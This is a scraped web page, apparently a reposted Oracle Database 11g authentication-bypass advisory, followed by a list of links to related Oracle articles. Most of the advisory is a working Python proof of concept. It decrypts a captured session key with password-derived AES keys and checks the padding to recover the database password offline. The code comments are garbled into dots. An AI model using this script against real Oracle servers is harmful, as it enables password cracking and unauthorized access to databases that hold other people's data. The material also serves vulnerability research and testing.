Oracle Database Authentication Protocol Security Bypass

简介: Oracle Database is prone to a remote security-bypass vulnerability that affects the authentication protocol.
Oracle Database is prone to a remote security-bypass vulnerability that affects the authentication protocol.
 
An attacker can exploit this issue to bypass the authentication process and gain unauthorized access to the database.
 
This vulnerability affects Oracle Database 11g Release 1 and 11g Release 2.
 
 
     #-*-coding:utf8 -*-
 
     import hashlib
     from Crypto.Cipher import AES
 
     def decrypt(session,salt,password):
             pass_hash = hashlib.sha1(password+salt)
 
             #......... ..... ..... .......... .. 24 ....
             key = pass_hash.digest() + '\x00\x00\x00\x00'
             decryptor = AES.new(key,AES.MODE_CBC)
             plain = decryptor.decrypt(session)
             return plain
 
     #............. ........... ...... 48 ....
     session_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767'
 
     #.... 10 ....
     salt_hex = 'A7193E546377EC56639E'
 
     passwords = ['test','password','oracle','demo']
 
     for password in passwords:
             session_id = decrypt(session_hex.decode('hex'),salt_hex.decode('hex'),password)
             print 'Decrypted session_id for password "%s" is %s' % (password,session_id.encode('hex'))
             if session_id[40:] == '\x08\x08\x08\x08\x08\x08\x08\x08':
                     print 'PASSWORD IS "%s"' % password
                     break
目录
相关文章
|
SQL Oracle 关系型数据库
WARNING: Too Many Parse Errors With error=911 When Running a JDBC Application Connected to an Oracle 19c database
WARNING: Too Many Parse Errors With error=911 When Running a JDBC Application Connected to an Oracle 19c database (
599 2
|
Oracle 关系型数据库
19c 开启Oracle Database Vault
19c 开启Oracle Database Vault
440 1
|
SQL Oracle 关系型数据库
Connect to Autonomous Database Using Oracle Database Tools
Connect to Autonomous Database Using Oracle Database Tools
618 156
|
人工智能 Oracle 关系型数据库
一篇文章弄懂Oracle和PostgreSQL的Database Link
一篇文章弄懂Oracle和PostgreSQL的Database Link
|
Oracle 关系型数据库 Linux
Requirements for Installing Oracle Database/Client 19c on OL8 or RHEL8 64-bit (x86-64) (Doc ID 2668780.1)
Requirements for Installing Oracle Database/Client 19c on OL8 or RHEL8 64-bit (x86-64) (Doc ID 2668780.1)
334 0
|
SQL Oracle 安全
Oracle Database Vault Access Control Components
Oracle Database Vault Access Control Components
248 0
|
Oracle 安全 关系型数据库
What Is Oracle Database Vault?
The Oracle Database Vault security controls protect application data from unauthorized access, and helps you to comply with privacy and regulatory requirements. You can deploy controls to block privileged account access to application data and control sensitive operations inside the database using
190 0

推荐镜像

更多